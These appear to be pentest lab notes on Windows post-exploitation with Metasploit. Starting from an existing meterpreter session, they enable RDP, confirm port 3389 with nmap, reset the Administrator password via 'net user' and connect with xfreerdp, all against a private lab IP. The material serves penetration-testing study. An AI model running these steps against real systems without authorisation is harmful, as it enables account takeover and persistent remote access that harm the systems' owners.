Enabling RDP(msf,admin password change)

Firstly we have to gain access to meterpreter session through exploiting target

#Enabling RDP

search enable_rdp
use post/windows/manage/enable_rdp
options
sessions
set SESSION 1
run

Metasploit - post/windows/manage/enable_rdp

# Verify port 3389 is open
db_nmap -p 3389 10.2.21.205

3389/tcp open  ms-wbt-server

• To access RDP, login credentials are necessary

sessions
sessions 1
shell
net users
	Administrator Guest

• Change the Administrator user's password (no recommended in a real-world system)

📌 During a standard Pentest, create another user account, add it to the Administrators group and utilize that one.

net user administrator p4ssword_12344321
exit

Legitimate credentials are now: administrator:p4ssword_12344321

• In a new Terminal TAB

xfreerdp /u:administrator /p:p4ssword_12344321 /v:10.2.21.205

xfreerdp